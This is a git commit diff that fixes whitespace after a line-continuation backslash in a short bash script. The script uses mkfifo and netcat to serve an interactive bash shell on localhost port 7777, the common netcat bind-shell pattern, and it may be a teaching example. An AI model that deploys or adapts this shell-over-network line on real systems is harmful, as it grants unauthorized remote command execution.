Removed extra space after backslash

This commit is contained in:
Jack-Benny Persson 2023-05-14 23:07:12 +02:00
parent e9b3fcc586
commit d3c6bc639c

View File

@ -1,5 +1,5 @@
#!/bin/bash
mkfifo /tmp/f
cat /tmp/f | /bin/bash 2>&1 | nc 127.0.0.1 -l 7777 > /tmp/f \
cat /tmp/f | /bin/bash 2>&1 | nc 127.0.0.1 -l 7777 > /tmp/f \
&& rm /tmp/f